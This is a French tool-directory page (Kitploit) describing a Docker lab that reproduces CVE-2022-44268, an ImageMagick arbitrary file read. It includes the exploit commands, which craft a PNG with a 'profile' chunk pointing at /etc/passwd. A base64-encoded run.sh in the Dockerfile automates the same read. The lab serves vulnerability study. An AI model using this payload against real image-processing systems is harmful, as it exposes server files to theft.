Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment — L'environnement Docker de reproduction de la vulnérabilité pour CVE-2022-44268 | Kitploit
Outils/GitHubGitHub/y1nglamore/cve-2022-44268-imagemagick-vulnerable-docker-environment
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHuby1nglamore/cve-2022-44268-imagemagick-vulnerable-docker-environment

CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment

L'environnement Docker de reproduction de la vulnérabilité pour CVE-2022-44268

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
102il y a 3 ansPas encore vérifié

CVE-2022-44268 Lecture arbitraire de fichier local ImageMagick

https://www.metabaseq.com/imagemagick-zero-days/

Basé sur le PoC CVE-2022-44268 ImageMagick Arbitrary File Read PoC, j'ai créé un environnement de test de vulnérabilité en utilisant docker.

Utilisation

root@kitploit:~
# get image
docker pull y1nglamore/cve_2022_44268:latest # you can also build from Dockerfile

# run container
docker run --rm -i -t y1nglamore/cve_2022_44268 /bin/bash

Après cela, vous entrerez dans le conteneur ; en utilisant ./run.sh FILEPATH, ImageMagick lira le fichier.

m1-155000_hh4Qzq

Par défaut, ./run.sh lira /etc/passwd.

m1-155130_56zEuO

Vous pouvez également exécuter manuellement la commande suivante.

root@kitploit:~
pngcrush -text a "profile" "/etc/passwd" 1.png
exiv2 -pS pngout.png
convert pngout.png gopro.png

identify -verbose gopro.png

Dockerfile

root@kitploit:~
FROM ubuntu:20.04

RUN apt update --allow-insecure-repositories
RUN apt-get install pngcrush  -y --allow-unauthenticated
RUN apt-get install imagemagick  -y --allow-unauthenticated
RUN apt-get install  exiftool exiv2 wget -y --allow-unauthenticated
RUN apt-get install xxd -y   --allow-unauthenticated

WORKDIR /root
RUN wget http://cdn2.pic.y1ng.vip/uPic/2023/02/03/m1-145410_1.png -O 1.png
RUN echo 'IyEvYmluL2Jhc2gKCmlmIFsgLXogIiQxIiBdOyB0aGVuCiAgICBmaWxlPSIvZXRjL3Bhc3N3ZCIKZWxzZQogICAgZmlsZT0iJDEiCmZpCgpwbmdjcnVzaCAtdGV4dCBhICJwcm9maWxlIiAiJGZpbGUiIDEucG5nIApleGl2MiAtcFMgcG5nb3V0LnBuZyAKY29udmVydCBwbmdvdXQucG5nIGdvcHJvLnBuZyAKCmlkZW50aWZ5IC12ZXJvYm9zZSBnb3Byby5wbmcgfCBncmVwIC1lICJeWzAtOWEtZl0qJCIgfCAgZ3JlcCAuIHwgeHhkIC1yIC1wCg==' | base64 -d > run.sh 
RUN chmod +x run.sh

CMD sleep infinity

Référence et remerciements

https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

Télécharger l’outil